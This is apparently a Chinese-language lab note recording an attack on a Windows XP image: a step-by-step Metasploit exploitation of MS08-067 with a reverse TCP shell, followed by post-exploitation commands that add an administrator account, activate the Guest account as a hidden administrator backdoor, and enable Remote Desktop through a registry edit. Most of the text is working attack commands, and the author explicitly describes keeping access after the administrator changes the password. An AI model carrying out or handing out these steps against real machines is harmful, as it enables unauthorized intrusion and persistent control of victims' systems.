更换了镜像之后,一切显得理所当然一样,,,这根本不能用于实际,,
首先是metasploit的使用:
关于工具的使用,也发现了两种不同的方法,依次列举
1.0:
搜索方法:search ms08_067
可以看到有一个方法
然后使用这个方法:use exploit/windows/smb/ms08_067_netapi
然后查看可以应用的payload,就是通常所说的shell code,是一种攻击载荷,常用的类型有开放监听后门,运行某个命令或程序什么的,在这里,选择运行后门,并连接到控制端,set payload generic/shell_reverse_tcp
通过“show options"可以查看所需要的设置;
使用" show targets"可以查看渗透攻击模块可以成功攻击的平台;
在这里我用的镜像是winxp p3 简体中文 所以选择34
即 设置”set target 34"
设置攻击目标“set RHOST 目标ip地址”
设置回传端口"set LPORT 5000"
设置主机ip" set LHOST 主机ip“
运行exploit就可以看到成果了
2.0:
我从网络上看到的方法,比从书上看到的简单多了,,,真是耽误事,,因为很多步骤重复,我就不赘述了
首先当然是搜索方法,然后使用方法,查看所需要的配置,配置所要攻击的目标机的ip,接着设置target,完成后输入expolit或run得到一个meterpreter,输入shell就进入了cmd命令行,完成结果和第一个方法完全相同,方法简单很多。
上述的两种方法参照metasploit渗透测试魔鬼训练营和网络上的牛人,,(应该不会算侵权吧。。。)
接下来就是激动人心的时刻了,既然都能运行shell命令了,还有什么不能干。。。
查看端口开放情况netstat -an
新建用户
1.0
net user admin(名) 123456(密码) /add
提升权限net localgroup administrators admin /add 当然也可以提升现有用户的权限
2.0
首先 C:\>net user guest /active:yes
将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
然后 C:\>net user guest 1234
将Guest的密码改为1234,或者改成你喜欢的密码
最后 C:\>net localgroup administrators guest /add
将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策 略的设置,
可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
或创建一个组.然后用上面的命令加到管理员里面就可以了。
开放3389尝试远程连接:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
然后远程连接就行了 kali自带远程连接所需的所有东西,所以都不用下直接rdesktop ip:端口号,就可以连接啦。
Windows的话,运行,mstsc。
删除windowxp用户net user 名 /del;